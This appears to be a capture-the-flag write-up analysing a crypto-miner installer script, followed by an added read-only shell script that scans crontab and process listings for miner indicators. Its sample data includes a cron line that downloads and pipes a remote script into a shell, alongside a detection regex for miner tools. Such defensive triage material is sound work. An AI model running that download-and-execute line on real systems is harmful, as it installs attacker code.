CHALLENGE DESCRIPTION
In the race for Vitalium on Mars, the villainous Board of Arodor resorted to desperate measures, needing funds for their mining attempts. They devised a botnet specifically crafted to mine cryptocurrency covertly. We stumbled upon a sample of Arodor's miner's installer on our server. Recognizing the gravity of the situation, we launched a thorough investigation. With you as its leader, you need to unravel the inner workings of the installation mechanism. The discovery served as a turning point, revealing the extent of Arodor's desperation. However, the battle for Vitalium continued, urging us to remain vigilant and adapt our cyber defenses to counter future threats.
Solution Summary
1) Script analyses
2) Extract base64 strings
3) Reconstruct flag
References
N/A
1) Script analyses
Script Analyses Summary
The script appears to be looking for IOCs related to crypto mining and attempts to remediate them. For example, the script checks for services, log files, and network connections related to crypto mining and then attempts to stop the processes, delete the log files, and close the network connections.
We start by reviewing the provided challenge file "miner_installer.sh".
Initially, when I saw the file name and skimmed through the file, I felt this might be related to an IaC (infrastructure as code) platform such as Ansible, Puppet, Terraform and so on. But I quickly realized this script was actually enumerating the system for IOCs related to crypto mining in an attempt to remediate them.
The function "clean environment" caught my attention, as it removes files and changes permissions. This includes sensitive locations such as the root user's SSH key.
The following part of the script looks for specific entries in the crontab.
In this area, we see the script checking for processes related to crypto mining.
We continue to see the script checking for processes related to crypto mining and killing them.
From here we see attempts to clean up log files related to crypto-mining services, which were identified by googling the IOCs found below.
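The script analysed above combines crontab checks, process checks and log clean-up into one remediation tool. As an added example (not the challenge's miner_installer.sh and not the author's code), the following POSIX shell helper shows the detection half of that workflow in read-only form: it scans a crontab listing and a process listing for miner indicators and reports matches instead of killing processes or deleting files, which is how an analyst would triage a host before deciding on remediation. The sample crontab and process lines, and the indicator list in MINER_PATTERNS, are constructed for this example and are not the IOCs from the challenge file.

```shell
#!/bin/sh
# Added example: read-only triage for coin-miner indicators in crontab and
# process listings. Reports matches; performs no remediation.

# Constructed sample data standing in for `crontab -l` and `ps aux` output.
SAMPLE_CRON='0 * * * * /usr/bin/backup.sh
*/5 * * * * curl -s http://203.0.113.10/x.sh | sh
@reboot /tmp/.X11-unix/kdevtmpfsi'

SAMPLE_PS='root  412  0.0  0.1 /usr/sbin/sshd
user 1337 97.3  2.0 /tmp/xmrig -o pool.example:3333 --donate-level 1
root 2201  0.1  0.5 /usr/lib/systemd/systemd-journald'

# Assumed indicator list (constructed for this example): well-known miner
# binary names, a miner-specific flag, the stratum pool scheme, and the
# "download and pipe into a shell" pattern used by many droppers.
MINER_PATTERNS='xmrig|minerd|kdevtmpfsi|kinsing|stratum\+tcp|--donate-level|curl.*\|.*sh'

# scan_miner_iocs LABEL TEXT
#   Prints every matching line prefixed with "[LABEL]".
#   Returns 0 if at least one indicator matched, 1 otherwise.
scan_miner_iocs() {
    label=$1
    text=$2
    matches=$(printf '%s\n' "$text" | grep -E -- "$MINER_PATTERNS" || true)
    [ -n "$matches" ] || return 1
    printf '%s\n' "$matches" | sed "s/^/[$label] /"
    return 0
}

# count_miner_iocs TEXT
#   Prints the number of lines that matched an indicator (0 if none).
count_miner_iocs() {
    printf '%s\n' "$1" | grep -E -c -- "$MINER_PATTERNS" || true
}

# Stand-alone run: triage the constructed samples. On a live host you would
# feed `crontab -l` and `ps aux` output in place of the samples.
if [ "${0##*/}" != "sh" ]; then
    scan_miner_iocs cron "$SAMPLE_CRON" || echo "no cron indicators"
    scan_miner_iocs ps "$SAMPLE_PS" || echo "no process indicators"
fi
```

Keeping detection separate from remediation is the point: the challenge script removes files and kills processes as soon as it matches an indicator, whereas a triage run like this one preserves evidence (the cron entry, the command line, the pool address) for the investigation before anything is changed.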